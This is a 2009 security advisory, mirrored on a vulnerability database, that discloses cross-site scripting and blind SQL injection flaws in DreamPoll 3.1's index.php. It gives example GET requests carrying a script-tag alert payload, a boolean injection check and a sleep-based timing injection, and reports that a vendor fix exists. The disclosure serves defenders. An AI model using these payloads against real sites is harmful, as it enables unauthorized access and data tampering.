Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22576
HistoryOct 09, 2009 - 12:00 a.m.

DreamPoll 3.1 Vulnerabilities

2009-10-0900:00:00
vulners.com
17
JSON

During a recent security audit of the DreamPoll 3.1 software by Dreamlevels, I discovered a number
of XSS and SQL Injection vulnerabilities in the application. These vulnerabilities could be
exploited to make unauthorized changes to a web site or compromise a client accessing a site that
utilizes the application. Details of the vulnerabilities are as follows:

XSS
————————-
File: index.php
Variable: recordsPerPage
Example: GET
/index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=1>”><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>

Blind SQL/Xpath Injection
————————-
File: index.php
Variable: sortField
Example: GET
/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20

Blind SQL Injection (Timing)
————————-
File: index.php
Variables: sortField, sortDesc, pageNumber
Example: GET
/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20

While not specifically tested, it is likely these vulnerabilities exist in earlier versions of this
application as well. The vendor was notified on 09/28/2009 and a fix was released the same day. If
you are a current user of this software, contact the vendor for the available fix.

http://www.infosecstuff.com

JSON